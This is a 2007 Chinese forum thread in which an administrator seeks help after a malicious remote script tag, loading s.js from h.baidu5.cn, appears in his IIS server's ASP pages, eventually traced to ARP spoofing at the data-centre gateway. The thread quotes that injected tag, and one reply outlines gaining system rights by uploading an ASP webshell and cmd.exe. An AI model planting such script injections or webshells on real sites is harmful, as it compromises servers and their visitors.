您的位置:程序门 -> windows专区 -> 安全技术/病毒



刚做好的2003服务器中毒了,要被老板打了,,急~~~~~~~~~~~~~~~~~~


[收藏此页] [打印本页]选择字色:背景色:字体:[][][]


刚做好的2003服务器中毒了,要被老板打了,,急~~~~~~~~~~~~~~~~~~
发表于:2007-05-19 09:03:55 楼主
事件类型: 审核成功
事件来源: security
事件种类: 详细追踪  
事件   id: 592
日期: 2007-5-19
事件: 4:13:02
用户: nt   authority\system
计算机: rqfdf-aq6sso9sp
描述:
已经创建新的过程:
  新的进程   id: 3196
  映像文件名: c:\windows\system32\csrss.exe
  创建者进程   id: 288
  用户名: rqfdf-aq6sso9sp$
  域: workgroup
  登录   id: (0x0,0x3e7)


事件类型: 审核成功
事件来源: security
事件种类: 详细追踪  
事件   id: 592
日期: 2007-5-19
事件: 4:13:02
用户: nt   authority\system
计算机: rqfdf-aq6sso9sp
描述:
已经创建新的过程:
  新的进程   id: 3016
  映像文件名: c:\windows\system32\winlogon.exe
  创建者进程   id: 288
  用户名: rqfdf-aq6sso9sp$
  域: workgroup
  登录   id: (0x0,0x3e7)
radfd-aq6ss09sp     iis来宾帐户


iis的服务骑,asp系统,在访问asp网页的时候会被自动加载源代码 <script   src=http://h.baidu5.cn/s.js> </script>       ,查了代码却没有这个,很郁闷。。昨天就这样。。。昨晚新做了一个系统,,   安全就发现上面两个有点问题。。
端口开了21,80,3389
怀疑是arp攻击     有没有好的arp软件?
发表于:2007-05-19 09:14:331楼 得分:0
为什么开3389??你的应该是3389攻击
发表于:2007-05-19 09:16:292楼 得分:0
3389也能发生这样的情况??
发表于:2007-05-19 09:18:363楼 得分:0
先帮我处理一下iis的病毒了       谢谢大家。。。急死我了
发表于:2007-05-19 10:15:124楼 得分:0
2003   如果开放了iis,没做设置情况下,   任意有aspshell的都可以获得系统权限.

上传asp木马,   上传cmd.exe   可以执行任意命令,获取系统权限!建立帐号,开放3389自然也是其中之列.
发表于:2007-05-19 10:18:335楼 得分:0
如果你的服务器没有开放ftp,或者说你的服务器所有网站上没有上传等获得webshell的漏洞.排除了外部有webshell的可能性.   那就从自己机器上找找原因了.
发表于:2007-05-19 11:51:296楼 得分:0
帮顶!
发表于:2007-05-19 13:45:137楼 得分:0
殺毒.............
发表于:2007-05-21 09:08:068楼 得分:0
郁闷
发表于:2007-05-21 12:07:499楼 得分:0
只能用杀毒软件了
发表于:2007-05-22 15:50:2710楼 得分:0
查出问题     ,,,,机房网关中毒       都和他们说了是arp       他吗     还说不是  
发表于:2007-05-22 15:53:5011楼 得分:0
用arp   -all命令看看,叫机房去查网关网卡的物理地址   就能确认

相关文章
其他资讯

快速检索
分类导航标签a

最新资讯
热门点击